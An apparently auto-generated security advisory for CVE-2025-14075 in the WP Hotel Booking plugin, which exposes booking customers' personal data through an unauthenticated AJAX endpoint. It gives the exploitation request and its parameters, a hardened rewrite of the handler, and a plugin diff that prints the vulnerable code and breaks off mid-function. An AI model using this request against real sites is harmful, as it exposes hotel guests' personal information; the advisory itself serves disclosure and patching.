Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14075: WP Hotel Booking <= 2.2.7 – Unauthenticated Sensitive Information Exposure via 'email' Parameter (wp-hotel-booking)

Severity: Medium (CVSS 5.3)
CWE: CWE-200
Vulnerable Version: 2.2.7
Patched Version: 2.2.8
Disclosed: January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14075:
The WP Hotel Booking plugin up to version 2.2.7 contains an unauthenticated sensitive information exposure vulnerability. The plugin’s AJAX handler for fetching customer information lacks proper capability checks, allowing attackers to retrieve PII including full names, addresses, phone numbers, and email addresses by submitting a valid email address and a publicly accessible nonce.

Root Cause:
The vulnerability exists in the `fetch_customer_info()` method within `/wp-hotel-booking/includes/class-wphb-ajax.php`. The class constructor registers the `hotel_booking_fetch_customer_info` AJAX action for both authenticated and unauthenticated users: the action is flagged as public in the `$ajax_actions` array, so it is hooked on `wp_ajax_nopriv_hotel_booking_fetch_customer_info` as well as `wp_ajax_hotel_booking_fetch_customer_info`. The method only validates a nonce via `wp_verify_nonce()` and performs no user capability check. It queries the `hb_booking` post type by the `_hb_customer_email` meta value taken from the `email` parameter and returns the first matching booking post together with all of its post meta, with no authorization verification.

Exploitation:
Attackers send a POST request to `/wp-admin/admin-ajax.php` with the following parameters: `action=hotel_booking_fetch_customer_info`, `email=victim@example.com`, and `nonce=[valid_nonce]`. The nonce can be obtained from publicly accessible plugin pages that generate the `hb_booking_nonce_action` nonce. The server responds with a JSON object containing all customer metadata fields from the booking post, including sensitive personal information.

Patch Analysis:
The patch adds a capability check to the `fetch_customer_info()` function. The updated code requires the current user to have the `manage_hb_booking` capability before the request is processed, which restricts the endpoint to administrators and other users with booking management permissions. The nonce validation remains, but it now serves its proper role as CSRF protection for the authorized user rather than as the only access control.
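As an added illustration (not the plugin's own 2.2.8 code, which the truncated diff on this page does not show), a hardened form of the handler that puts the `manage_hb_booking` capability check described above before the nonce check, validates the `email` parameter, and returns an allow-list of fields instead of the whole post and every meta row. The helper `hb_get_request()` and the `_hb_customer_email` meta key come from the diff; the other meta key names are assumed.

```php
<?php
// Added example, not the plugin's actual patch. Hardened replacement for
// WPHB_Ajax::fetch_customer_info() as described in the patch analysis.

function hardened_fetch_customer_info() {
	// 1. Authorization first. A nonce only proves the request was built from
	//    one of the site's own pages; it says nothing about who is asking,
	//    and the original handler used it as its sole gate.
	if ( ! current_user_can( 'manage_hb_booking' ) ) {
		wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
	}

	// 2. CSRF protection for the authorized user. Same nonce action as the
	//    original code; check_ajax_referer() dies with -1 on failure.
	check_ajax_referer( 'hb_booking_nonce_action', 'nonce' );

	// 3. Input validation: only a syntactically valid address reaches the query.
	$email = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );
	if ( ! is_email( $email ) ) {
		wp_send_json_error( array( 'message' => 'Invalid email' ), 400 );
	}

	// 4. Same lookup as the original (hb_booking post matched on the
	//    _hb_customer_email meta value), limited to one result.
	$posts = get_posts(
		array(
			'post_type'   => 'hb_booking',
			'meta_key'    => '_hb_customer_email',
			'meta_value'  => $email,
			'post_status' => 'any',
			'numberposts' => 1,
		)
	);
	if ( ! $posts ) {
		wp_send_json_success( null );
	}

	// 5. Data minimisation: return an explicit allow-list of meta keys rather
	//    than the WP_Post object plus all of get_post_meta( $id ). The key
	//    names below other than _hb_customer_email are assumed for illustration.
	$allowed = array(
		'_hb_customer_first_name',
		'_hb_customer_last_name',
		'_hb_customer_email',
		'_hb_customer_phone',
	);
	$data = array( 'booking_id' => (int) $posts[0]->ID );
	foreach ( $allowed as $key ) {
		$data[ $key ] = get_post_meta( $posts[0]->ID, $key, true );
	}
	wp_send_json_success( $data );
}

// Defence in depth: register the handler for logged-in users only. With the
// capability check in place a wp_ajax_nopriv_ hook would always fail anyway,
// so there is no reason to expose the action to anonymous visitors at all.
add_action( 'wp_ajax_hotel_booking_fetch_customer_info', 'hardened_fetch_customer_info' );
```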

Impact:
Successful exploitation allows unauthenticated attackers to retrieve sensitive customer information including full names, physical addresses, phone numbers, and email addresses. This constitutes a privacy violation and potential GDPR compliance issue. The exposed data could facilitate targeted phishing attacks, identity theft, or further social engineering attacks against hotel guests.

Differential between vulnerable and patched code

Code Diff
--- a/wp-hotel-booking/assets/dist/js/frontend/hotel-booking.asset.php
+++ b/wp-hotel-booking/assets/dist/js/frontend/hotel-booking.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => 'bdc62b67782a34752e70');
+<?php return array('dependencies' => array(), 'version' => '860310930a02493ba34e');
--- a/wp-hotel-booking/assets/dist/js/frontend/hotel-booking.min.asset.php
+++ b/wp-hotel-booking/assets/dist/js/frontend/hotel-booking.min.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '5481565f3c653226ec4a');
+<?php return array('dependencies' => array(), 'version' => '89254d5edb5ad3927ae8');
--- a/wp-hotel-booking/includes/TemplateHooks/ArchiveRoomTemplate.php
+++ b/wp-hotel-booking/includes/TemplateHooks/ArchiveRoomTemplate.php
@@ -1,313 +1,313 @@
-<?php
-/**
- * Template archive rooms
- *
- * @since 2.1.8
- * @version 1.0.0
- */
-
-namespace WPHBTemplateHooks;
-
-use Exception;
-use WPHBHelpersSingleton;
-use WPHBHelpersTemplate;
-use WPHB_Settings;
-
-class ArchiveRoomTemplate {
-	use Singleton;
-
-	public function init() {
-		add_action( 'wphb/list-rooms/layout', array( $this, 'layout_rooms' ), 10, 1 );
-	}
-
-	public function layout_rooms( $atts = array() ) {
-		try {
-			$rooms_html_wrapper = apply_filters(
-				'wphb/list-rooms/layout/wrapper',
-				array(
-					'<div class="container room-container">' => '</div>',
-				)
-			);
-
-			$rooms_content = static::render_rooms();
-			echo Template::instance()->nest_elements( $rooms_html_wrapper, $rooms_content );
-		} catch ( Exception $e ) {
-			echo 'Error: ' . $e->getMessage();
-		}
-	}
-
-	/**
-	 * Render template list rooms with settings param.
-	 *
-	 *
-	 * @return string
-	 */
-	public static function render_rooms() {
-		global $wp_query;
-		if ( $wp_query->is_tax( 'hb_room_type' ) ) {
-			$room_type = $wp_query->queried_object_id;
-		} else {
-			$room_type = hb_get_request( 'room_type', '' );
-		}
-		$paged = get_query_var( 'paged' ) ?: hb_get_request( 'paged', 1, 'int' );
-		$atts  = array(
-			'check_in_date'  => hb_get_request( 'check_in_date', date( 'Y/m/d' ) ),
-			'check_out_date' => hb_get_request( 'check_out_date', date( 'Y/m/d', strtotime( '+1 day' ) ) ),
-			'adults'         => hb_get_request( 'adults', 1 ),
-			'max_child'      => hb_get_request( 'max_child', 0 ),
-			'room_qty'       => hb_get_request( 'room_qty', 1 ),
-			'widget_search'  => false,
-			'hb_page'        => $paged,
-			'min_price'      => hb_get_request( 'min_price', 0 ),
-			'max_price'      => hb_get_request( 'max_price', '' ),
-			'rating'         => hb_get_request( 'rating', '' ),
-			'room_type'      => $room_type,
-			'sort_by'        => hb_get_request( 'sort_by', '' ),
-		);
-
-		$results = hb_search_rooms( $atts );
-		$max_num_pages = 0;
-		if ( empty( $results ) || empty( $results['data'] ) ) {
-			$rooms = array();
-			$total = 0;
-			$paged = 1;
-
-			$posts_per_page = (int) apply_filters( 'hb_number_search_rooms_per_page', WPHB_Settings::instance()->get( 'posts_per_page', 8 ) );
-		} else {
-			$rooms = $results['data'];
-			$total = $results['total'];
-			$paged = $results['page'];
-
-			$posts_per_page = $results['posts_per_page'];
-			$max_num_pages  = $results['max_num_pages'];
-		}
-
-		// HTML section rooms.
-		$html_rooms = '';
-
-		ob_start();
-		if ( empty( $rooms ) ) {
-			_e( 'No room found', 'wp-hotel-booking' );
-		} else {
-			hotel_booking_room_loop_start();
-			foreach ($rooms as $room) {
-				global $post;
-				$post = get_post($room->ID);
-				setup_postdata($post);
-				hb_get_template_part( 'content', 'room' );
-			}
-			hotel_booking_room_loop_end();
-			wp_reset_postdata();
-		}
-
-		$html_rooms = ob_get_clean();
-		// end HTML section rooms
-
-		// HTML Sort By
-		$sort_by = hb_get_request( 'sort_by' );
-
-		$data = array(
-			'sort_by' => $sort_by,
-		);
-
-		if ( $total ) {
-			$data['show_number'] = hb_get_show_room_text(
-				array(
-					'paged'         => $paged,
-					'total'         => $total,
-					'item_per_page' => $posts_per_page,
-				)
-			);
-		}
-
-		$sort_by = hb_get_template_content( 'search/v2/sort-by.php', compact( 'data' ) );
-
-		// html pagination
-		$data_pagination = array(
-			'total_pages' => $max_num_pages,
-			'paged'       => $paged,
-		);
-		$html_pagination = static::instance()->html_pagination( $data_pagination );
-
-		// section_rooms
-		$section_rooms = apply_filters(
-			'wbhb/layout/list-rooms/section/rooms',
-			array(
-				'wrapper'     => '<div class="room-content">',
-				'sort_by'     => $sort_by,
-				'rooms'       => $html_rooms,
-				'pagination'  => $html_pagination,
-				'wrapper_end' => '</div>',
-			),
-			$results,
-			$atts
-		);
-
-		// check show filter
-		if ( get_option( 'tp_hotel_booking_filter_price_enable', 1 ) ) {
-			$filter = hb_get_template_content( 'search/v2/search-filter-v2.php', array( 'atts' => array() ) );
-		} else {
-			$filter = '';
-		}
-		$check_room_availability = static::instance()->check_room_availability( $atts );
-		// section ( filter + section_rooms )
-		$section = apply_filters(
-			'wbhb/layout/list-rooms/section',
-			array(
-				'check_availability'  => $check_room_availability,
-				'archive_content'     => '<div>',
-				'filter'              => $filter,
-				'rooms'               => Template::combine_components( $section_rooms ),
-				'archive_content_end' => '</div>',
-			),
-			$rooms,
-			$atts
-		);
-
-		$content = Template::combine_components( $section );
-
-		return $content;
-	}
-
-	/**
-	 * Pagination
-	 * support pagination number
-	 * any support other type pagination add here
-	 *
-	 * @param array $data
-	 *
-	 * @return string
-	 */
-	public function html_pagination( array $data = array() ): string {
-		if ( empty( $data['total_pages'] ) || $data['total_pages'] <= 1 ) {
-			return '';
-		}
-
-		$html_wrapper = array(
-			' <nav class="rooms-pagination">' => '</nav>',
-		);
-
-		$pagination = paginate_links(
-			apply_filters(
-				'hb_pagination_args',
-				array(
-					'base'      => esc_url_raw( str_replace( 999999999, '%#%', get_pagenum_link( 999999999, false ) ) ),
-					'format'    => '',
-					'add_args'  => '',
-					'current'   => max( 1, $data['paged'] ?? 1 ),
-					'total'     => $data[ 'total_pages' ?? 1 ],
-					'prev_text' => __( 'Previous', 'wp-hotel-booking' ),
-					'next_text' => __( 'Next', 'wp-hotel-booking' ),
-					'type'      => 'list',
-					'end_size'  => 3,
-					'mid_size'  => 3,
-				)
-			)
-		);
-
-		return Template::instance()->nest_elements( $html_wrapper, $pagination );
-	}
-
-	public function check_room_availability( $atts ) {
-		$title          = sprintf( '<h3>%s</h3>', __( 'Check avaibility', 'wp-hotel-booking' ) );
-		$check_in_date  = hb_get_request( 'check_in_date', date( 'Y/m/d' ) );
-		$check_out_date = hb_get_request( 'check_out_date', date( 'Y/m/d', strtotime( '+1 day' ) ) );
-		$adults         = hb_get_request( 'adults', 1 );
-		$max_child      = hb_get_request( 'max_child', 0 );
-		$room_qty       = hb_get_request( 'room_qty', 1 );
-
-		$check_in_date_html  = $this->date_field( __( 'Check-in Date', 'wp-hotel-booking' ), 'check_in_date', $atts['check_in_date'] );
-		$check_out_date_html = $this->date_field( __( 'Check-out Date', 'wp-hotel-booking' ), 'check_out_date', $atts['check_out_date'] );
-		$adults_html         = $this->dropdown_selector(
-			__( 'Adults', 'wp-hotel-booking' ),
-			'adults_capacity',
-			$atts['adults']
-		);
-		$child_html          = $this->dropdown_selector(
-			__( 'Children', 'wp-hotel-booking' ),
-			'max_child',
-			$atts['max_child'],
-			0
-		);
-		$quantity_html       = $this->dropdown_selector(
-			__( 'Rooms', 'wp-hotel-booking' ),
-			'room_qty',
-			$atts['room_qty'],
-		);
-		$button_html         = sprintf( '<div class="hb-form-field-input"><button type="submit" class="rooms-check-avaibility">%s</button></div>', __( 'Check avaibility', 'wp-hotel-booking' ) );
-
-		$sections            = apply_filters(
-			'wbhb/layout/list-rooms/section/check-availability-form',
-			array(
-				'wrapper'         => '<div class="hotel-booking-rooms-search">',
-				'title'           => $title,
-				'form_start'      => '<form name="hb-search-form" class="hb-search-form hb-form-table" >',
-				'check_in_date'   => $check_in_date_html,
-				'check_out_date'  => $check_out_date_html,
-				'adults_capacity' => $adults_html,
-				'child_capacity'  => $child_html,
-				'quantity'        => $quantity_html,
-				'button_search'   => $button_html,
-				'form_end'        => '</form>',
-				'wrapper_end'     => '</div>',
-			),
-			$atts
-		);
-		return Template::combine_components( $sections );
-	}
-
-	public function date_field( $label = '', $name = '', $value = '' ) {
-		$label_html = sprintf( '<label>%s</label>', $label );
-		$input      = sprintf(
-			'<input type="text" name="%1$s" class="hb_input_date_check" value="%2$s" placeholder="%3$s" autocomplete="off"/>',
-			$name,
-			$value,
-			$label
-		);
-		$sections   = array(
-			'wrapper'     => '<div class="hb-form-field-input">',
-			'label'       => $label_html,
-			'input'       => $input,
-			'wrapper_end' => '</div>',
-		);
-		return Template::combine_components( $sections );
-	}
-
-	public function dropdown_selector( $label = '', $name = '', $value = 1, $min = 1 ) {
-
-		$label          = sprintf( '<label>%s</label>', $label );
-		$input_html     = sprintf(
-			'<div class="hb-form-field-input hb-input-field-number">
-		        <input type="number" step="1" min="%1$d" name="%2$s" value="%3$s" />
-		    </div>',
-		    $min, $name, $value
-		);
-		$nav_number_html = sprintf(
-			'<div class="hb-form-field-list nav-number-input-field">
-		        <span class="label">%s</span>
-		        <div class="number-box">
-		            <span class="number-icons hb-goDown"><i class="fa fa-minus"></i></span>
-		            <span class="hb-number-field-value">
-		            </span>
-		            <span class="number-icons hb-goUp"><i class="fa fa-plus"></i></span>
-		        </div>
-		    </div>',
-		    $label
-		);
-
-		$sections = apply_filters(
-			'wbhb/layout/list-rooms/check-availability-form/number-input',
-			array(
-				//sửa sang wrapper này để theme hiển thị dạng +/-
-				// 'wrapper'     => '<div class="hb-form-field hb-form-number hb-form-number-input">',
-				'wrapper'     => '<div class="hb-form-field hb-form-number">',
-				'label'       => $label,
-				'input'       => $input_html,
-				'nav_number'  => $nav_number_html,
-				'wrapper_end' => '</div>',
-			)
-		);
-
-		return Template::combine_components( $sections );
-	}
-}
+<?php
+/**
+ * Template archive rooms
+ *
+ * @since 2.1.8
+ * @version 1.0.0
+ */
+
+namespace WPHBTemplateHooks;
+
+use Exception;
+use WPHBHelpersSingleton;
+use WPHBHelpersTemplate;
+use WPHB_Settings;
+
+class ArchiveRoomTemplate {
+	use Singleton;
+
+	public function init() {
+		add_action( 'wphb/list-rooms/layout', array( $this, 'layout_rooms' ), 10, 1 );
+	}
+
+	public function layout_rooms( $atts = array() ) {
+		try {
+			$rooms_html_wrapper = apply_filters(
+				'wphb/list-rooms/layout/wrapper',
+				array(
+					'<div class="container room-container">' => '</div>',
+				)
+			);
+
+			$rooms_content = static::render_rooms();
+			echo Template::instance()->nest_elements( $rooms_html_wrapper, $rooms_content );
+		} catch ( Exception $e ) {
+			echo 'Error: ' . $e->getMessage();
+		}
+	}
+
+	/**
+	 * Render template list rooms with settings param.
+	 *
+	 *
+	 * @return string
+	 */
+	public static function render_rooms() {
+		global $wp_query;
+		if ( $wp_query->is_tax( 'hb_room_type' ) ) {
+			$room_type = $wp_query->queried_object_id;
+		} else {
+			$room_type = hb_get_request( 'room_type', '' );
+		}
+		$paged = get_query_var( 'paged' ) ?: hb_get_request( 'paged', 1, 'int' );
+		$atts  = array(
+			'check_in_date'  => hb_get_request( 'check_in_date', date( 'Y/m/d' ) ),
+			'check_out_date' => hb_get_request( 'check_out_date', date( 'Y/m/d', strtotime( '+1 day' ) ) ),
+			'adults'         => hb_get_request( 'adults', 1 ),
+			'max_child'      => hb_get_request( 'max_child', 0 ),
+			'room_qty'       => hb_get_request( 'room_qty', 1 ),
+			'widget_search'  => false,
+			'hb_page'        => $paged,
+			'min_price'      => hb_get_request( 'min_price', 0 ),
+			'max_price'      => hb_get_request( 'max_price', '' ),
+			'rating'         => hb_get_request( 'rating', '' ),
+			'room_type'      => $room_type,
+			'sort_by'        => hb_get_request( 'sort_by', 'date-desc' ),
+		);
+
+		$results = hb_search_rooms( $atts );
+		$max_num_pages = 0;
+		if ( empty( $results ) || empty( $results['data'] ) ) {
+			$rooms = array();
+			$total = 0;
+			$paged = 1;
+
+			$posts_per_page = (int) apply_filters( 'hb_number_search_rooms_per_page', WPHB_Settings::instance()->get( 'posts_per_page', 8 ) );
+		} else {
+			$rooms = $results['data'];
+			$total = $results['total'];
+			$paged = $results['page'];
+
+			$posts_per_page = $results['posts_per_page'];
+			$max_num_pages  = $results['max_num_pages'];
+		}
+
+		// HTML section rooms.
+		$html_rooms = '';
+
+		ob_start();
+		if ( empty( $rooms ) ) {
+			_e( 'No room found', 'wp-hotel-booking' );
+		} else {
+			hotel_booking_room_loop_start();
+			foreach ($rooms as $room) {
+				global $post;
+				$post = get_post($room->ID);
+				setup_postdata($post);
+				hb_get_template_part( 'content', 'room' );
+			}
+			hotel_booking_room_loop_end();
+			wp_reset_postdata();
+		}
+
+		$html_rooms = ob_get_clean();
+		// end HTML section rooms
+
+		// HTML Sort By
+		$sort_by = hb_get_request( 'sort_by' );
+
+		$data = array(
+			'sort_by' => $sort_by,
+		);
+
+		if ( $total ) {
+			$data['show_number'] = hb_get_show_room_text(
+				array(
+					'paged'         => $paged,
+					'total'         => $total,
+					'item_per_page' => $posts_per_page,
+				)
+			);
+		}
+
+		$sort_by = hb_get_template_content( 'search/v2/sort-by.php', compact( 'data' ) );
+
+		// html pagination
+		$data_pagination = array(
+			'total_pages' => $max_num_pages,
+			'paged'       => $paged,
+		);
+		$html_pagination = static::instance()->html_pagination( $data_pagination );
+
+		// section_rooms
+		$section_rooms = apply_filters(
+			'wbhb/layout/list-rooms/section/rooms',
+			array(
+				'wrapper'     => '<div class="room-content">',
+				'sort_by'     => $sort_by,
+				'rooms'       => $html_rooms,
+				'pagination'  => $html_pagination,
+				'wrapper_end' => '</div>',
+			),
+			$results,
+			$atts
+		);
+
+		// check show filter
+		if ( get_option( 'tp_hotel_booking_filter_price_enable', 1 ) ) {
+			$filter = hb_get_template_content( 'search/v2/search-filter-v2.php', array( 'atts' => array() ) );
+		} else {
+			$filter = '';
+		}
+		$check_room_availability = static::instance()->check_room_availability( $atts );
+		// section ( filter + section_rooms )
+		$section = apply_filters(
+			'wbhb/layout/list-rooms/section',
+			array(
+				'check_availability'  => $check_room_availability,
+				'archive_content'     => '<div>',
+				'filter'              => $filter,
+				'rooms'               => Template::combine_components( $section_rooms ),
+				'archive_content_end' => '</div>',
+			),
+			$rooms,
+			$atts
+		);
+
+		$content = Template::combine_components( $section );
+
+		return $content;
+	}
+
+	/**
+	 * Pagination
+	 * support pagination number
+	 * any support other type pagination add here
+	 *
+	 * @param array $data
+	 *
+	 * @return string
+	 */
+	public function html_pagination( array $data = array() ): string {
+		if ( empty( $data['total_pages'] ) || $data['total_pages'] <= 1 ) {
+			return '';
+		}
+
+		$html_wrapper = array(
+			' <nav class="rooms-pagination">' => '</nav>',
+		);
+
+		$pagination = paginate_links(
+			apply_filters(
+				'hb_pagination_args',
+				array(
+					'base'      => esc_url_raw( str_replace( 999999999, '%#%', get_pagenum_link( 999999999, false ) ) ),
+					'format'    => '',
+					'add_args'  => '',
+					'current'   => max( 1, $data['paged'] ?? 1 ),
+					'total'     => $data[ 'total_pages' ?? 1 ],
+					'prev_text' => __( 'Previous', 'wp-hotel-booking' ),
+					'next_text' => __( 'Next', 'wp-hotel-booking' ),
+					'type'      => 'list',
+					'end_size'  => 3,
+					'mid_size'  => 3,
+				)
+			)
+		);
+
+		return Template::instance()->nest_elements( $html_wrapper, $pagination );
+	}
+
+	public function check_room_availability( $atts ) {
+		$title          = sprintf( '<h3>%s</h3>', __( 'Check avaibility', 'wp-hotel-booking' ) );
+		$check_in_date  = hb_get_request( 'check_in_date', date( 'Y/m/d' ) );
+		$check_out_date = hb_get_request( 'check_out_date', date( 'Y/m/d', strtotime( '+1 day' ) ) );
+		$adults         = hb_get_request( 'adults', 1 );
+		$max_child      = hb_get_request( 'max_child', 0 );
+		$room_qty       = hb_get_request( 'room_qty', 1 );
+
+		$check_in_date_html  = $this->date_field( __( 'Check-in Date', 'wp-hotel-booking' ), 'check_in_date', $atts['check_in_date'] );
+		$check_out_date_html = $this->date_field( __( 'Check-out Date', 'wp-hotel-booking' ), 'check_out_date', $atts['check_out_date'] );
+		$adults_html         = $this->dropdown_selector(
+			__( 'Adults', 'wp-hotel-booking' ),
+			'adults_capacity',
+			$atts['adults']
+		);
+		$child_html          = $this->dropdown_selector(
+			__( 'Children', 'wp-hotel-booking' ),
+			'max_child',
+			$atts['max_child'],
+			0
+		);
+		$quantity_html       = $this->dropdown_selector(
+			__( 'Rooms', 'wp-hotel-booking' ),
+			'room_qty',
+			$atts['room_qty'],
+		);
+		$button_html         = sprintf( '<div class="hb-form-field-input"><button type="submit" class="rooms-check-avaibility">%s</button></div>', __( 'Check avaibility', 'wp-hotel-booking' ) );
+
+		$sections            = apply_filters(
+			'wbhb/layout/list-rooms/section/check-availability-form',
+			array(
+				'wrapper'         => '<div class="hotel-booking-rooms-search">',
+				'title'           => $title,
+				'form_start'      => '<form name="hb-search-form" class="hb-search-form hb-form-table" >',
+				'check_in_date'   => $check_in_date_html,
+				'check_out_date'  => $check_out_date_html,
+				'adults_capacity' => $adults_html,
+				'child_capacity'  => $child_html,
+				'quantity'        => $quantity_html,
+				'button_search'   => $button_html,
+				'form_end'        => '</form>',
+				'wrapper_end'     => '</div>',
+			),
+			$atts
+		);
+		return Template::combine_components( $sections );
+	}
+
+	public function date_field( $label = '', $name = '', $value = '' ) {
+		$label_html = sprintf( '<label>%s</label>', $label );
+		$input      = sprintf(
+			'<input type="text" name="%1$s" class="hb_input_date_check" value="%2$s" placeholder="%3$s" autocomplete="off"/>',
+			$name,
+			$value,
+			$label
+		);
+		$sections   = array(
+			'wrapper'     => '<div class="hb-form-field-input">',
+			'label'       => $label_html,
+			'input'       => $input,
+			'wrapper_end' => '</div>',
+		);
+		return Template::combine_components( $sections );
+	}
+
+	public function dropdown_selector( $label = '', $name = '', $value = 1, $min = 1 ) {
+
+		$label          = sprintf( '<label>%s</label>', $label );
+		$input_html     = sprintf(
+			'<div class="hb-form-field-input hb-input-field-number">
+		        <input type="number" step="1" min="%1$d" name="%2$s" value="%3$s" />
+		    </div>',
+		    $min, $name, $value
+		);
+		$nav_number_html = sprintf(
+			'<div class="hb-form-field-list nav-number-input-field">
+		        <span class="label">%s</span>
+		        <div class="number-box">
+		            <span class="number-icons hb-goDown"><i class="fa fa-minus"></i></span>
+		            <span class="hb-number-field-value">
+		            </span>
+		            <span class="number-icons hb-goUp"><i class="fa fa-plus"></i></span>
+		        </div>
+		    </div>',
+		    $label
+		);
+
+		$sections = apply_filters(
+			'wbhb/layout/list-rooms/check-availability-form/number-input',
+			array(
+				//sửa sang wrapper này để theme hiển thị dạng +/-
+				// 'wrapper'     => '<div class="hb-form-field hb-form-number hb-form-number-input">',
+				'wrapper'     => '<div class="hb-form-field hb-form-number">',
+				'label'       => $label,
+				'input'       => $input_html,
+				'nav_number'  => $nav_number_html,
+				'wrapper_end' => '</div>',
+			)
+		);
+
+		return Template::combine_components( $sections );
+	}
+}
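Review bot: the only content change in this 313-line replace of ArchiveRoomTemplate.php is the default argument in `render_rooms()`, `'sort_by' => hb_get_request( 'sort_by', '' )` becoming `'sort_by' => hb_get_request( 'sort_by', 'date-desc' )`; every other line is removed and re-added verbatim, which looks like a line-ending or whitespace normalisation that hides the one real edit and is unrelated to the CVE fix. Put the normalisation in its own commit so the functional change is reviewable. While both versions are here: `'total' => $data[ 'total_pages' ?? 1 ]` in `html_pagination()` applies `??` to the string literal, which is never null, so the fallback is dead and the intent was presumably `$data['total_pages'] ?? 1`; `check_room_availability()` reads `$check_in_date`, `$check_out_date`, `$adults`, `$max_child` and `$room_qty` from the request but never uses them (it renders from `$atts`); and `dropdown_selector()` still carries a non-English comment next to a commented-out wrapper line that should be either restored or dropped.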
--- a/wp-hotel-booking/includes/class-wphb-ajax.php
+++ b/wp-hotel-booking/includes/class-wphb-ajax.php
@@ -1,919 +1,919 @@
-<?php
-/**
- * WP Hotel Booking ajax.
- *
- * @version       1.9.6
- * @author        ThimPress
- * @package       WP_Hotel_Booking/Classes
- * @category      Classes
- * @author        Thimpress, leehld
- */
-
-/**
- * Prevent loading this file directly
- */
-defined( 'ABSPATH' ) || exit;
-
-/**
- * Class WPHB_Ajax
- */
-class WPHB_Ajax {
-
-	/**
-	 * @var bool
-	 */
-	protected static $_loaded = false;
-
-	/**
-	 * Constructor
-	 */
-	function __construct() {
-		if ( self::$_loaded ) {
-			return;
-		}
-
-		$ajax_actions = array(
-			'fetch_customer_info'      => true,
-			'place_order'              => true,
-			'load_room_type_galley'    => false,
-			'parse_search_params'      => true,
-			'parse_booking_params'     => true,
-			'apply_coupon'             => true,
-			'remove_coupon'            => true,
-			'ajax_add_to_cart'         => true,
-			'add_extra_to_cart'        => true,
-			'ajax_remove_item_cart'    => true,
-			'load_order_user'          => false,
-			'load_room_ajax'           => false,
-			'check_room_available'     => false,
-			'load_order_item'          => false,
-			'load_coupon_ajax'         => false,
-			'admin_add_order_item'     => false,
-			'admin_remove_order_item'  => false,
-			'admin_remove_order_items' => false,
-			'add_coupon_to_order'      => false,
-			'remove_coupon_on_order'   => false,
-			'load_other_full_calendar' => false,
-			'dismiss_notice'           => true,
-			'create_pages'             => false,
-		);
-
-		foreach ( $ajax_actions as $action => $priv ) {
-			add_action( "wp_ajax_hotel_booking_{$action}", array( __CLASS__, $action ) );
-			if ( $priv ) {
-				add_action( "wp_ajax_nopriv_hotel_booking_{$action}", array( __CLASS__, $action ) );
-			}
-		}
-		self::$_loaded = true;
-	}
-
-	/**
-	 * It creates a page
-	 */
-	static function create_pages() {
-		$response = array(
-			'code'    => 0,
-			'message' => '',
-		);
-
-		if ( ! current_user_can( 'edit_pages' ) || empty( $_POST['page_name'] ) ) {
-			$response['message'] = __( 'Request invalid', 'wp-hotel-booking' );
-			hb_send_json( $response );
-		}
-
-		$page_name = WPHB_Helpers::sanitize_params_submitted( $_POST['page_name'] );
-
-		if ( $page_name ) {
-			$args = array(
-				'post_type'   => 'page',
-				'post_title'  => $page_name,
-				'post_status' => 'publish',
-			);
-
-			$page_id = wp_insert_post( $args );
-
-			if ( $page_id ) {
-				$response['code']    = 1;
-				$response['message'] = 'create page success';
-				$response['page']    = get_post( $page_id );
-				$response['html']    = '<a href="' . get_edit_post_link( $page_id ) . '" target="_blank">' . __( 'Edit Page', 'wp-hotel-booking' ) . '</a> ';
-				$response['html']   .= '<a href="' . get_permalink( $page_id ) . '" target="_blank">' . __( 'View Page', 'wp-hotel-booking' ) . '</a>';
-			} else {
-				$response['error'] = __( 'Error! Page creation failed. Please try again.', 'wp-hotel-booking' );
-			}
-		} else {
-			$response['error'] = __( 'Empty page name!', 'wp-hotel-booking' );
-		}
-
-		wp_send_json( $response );
-		die;
-	}
-
-	/**
-	 * Add extra to cart action.
-	 */
-	public static function add_extra_to_cart() {
-
-		if ( ! check_ajax_referer( 'hb_select_extra_nonce_action', 'nonce' ) ) {
-			return;
-		}
-
-		$cart_id = sanitize_text_field( wp_unslash( $_POST['cart_id'] ) );
-		if ( ! $cart_id ) {
-			hb_send_json(
-				array(
-					'status'  => 'warning',
-					'message' => __( 'Cart ID is invalid.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-
-		$cart       = WPHB_Cart::instance();
-		$extra_cart = HB_Extra_Cart::instance();
-		$cart_item  = $cart->get_cart_item( $cart_id );
-
-		if ( isset( $_POST['hb_optional_quantity_selected'] ) ) {
-			$selected  = WPHB_Helpers::sanitize_params_submitted( $_POST['hb_optional_quantity_selected'] );
-			$extra_qty = WPHB_Helpers::sanitize_params_submitted( $_POST['hb_optional_quantity'] );
-
-			foreach ( $selected as $extra_id => $select ) {
-				if ( $select == 'on' && $cart_item ) {
-					$extra_cart->ajax_added_cart(
-						$cart_id,
-						array(
-							'hb_optional_quantity' => array( $extra_id => $extra_qty[ $extra_id ] ),
-							'hb_optional_quantity_selected' => array( $extra_id => 'on' ),
-						),
-					);
-				}
-			}
-		}
-		$cart_url = hb_get_cart_url();
-
-		$pageRedirect = WPHB_Settings::instance()->getPageRedirect();
-
-		if ( $pageRedirect == '' ) {
-			$pageRedirect = $cart_url;
-		}
-
-		hb_send_json(
-			array(
-				'status'   => 'success',
-				'redirect' => $pageRedirect,
-			)
-		);
-	}
-
-
-	/**
-	 * Dismiss remove TP Hotel Booking plugin notice
-	 */
-	static function dismiss_notice() {
-		if ( empty( hb_get_request( 'nonce', false ) )
-			|| ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {
-			wp_die();
-		}
-
-		if ( is_multisite() ) {
-			update_site_option( 'wphb_notice_remove_hotel_booking', 1 );
-		} else {
-			update_option( 'wphb_notice_remove_hotel_booking', 1 );
-		}
-		wp_send_json(
-			array(
-				'status' => 'done',
-			)
-		);
-	}
-
-	/**
-	 * Fetch customer information with user email
-	 */
-	static function fetch_customer_info() {
-		if ( empty( hb_get_request( 'nonce', false ) )
-			|| ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {
-			die();
-		}
-		$email = hb_get_request( 'email' );
-		$args  = array(
-			'post_type'   => 'hb_booking',
-			'meta_key'    => '_hb_customer_email',
-			'meta_value'  => $email,
-			'post_status' => 'any',
-		);
-		// set_transient( 'hotel_booking_customer_email_' . WPHB_BLOG_ID, $email, DAY_IN_SECONDS );
-		WP_Hotel_Booking::instance()->cart->set_customer( 'customer_email', $email );
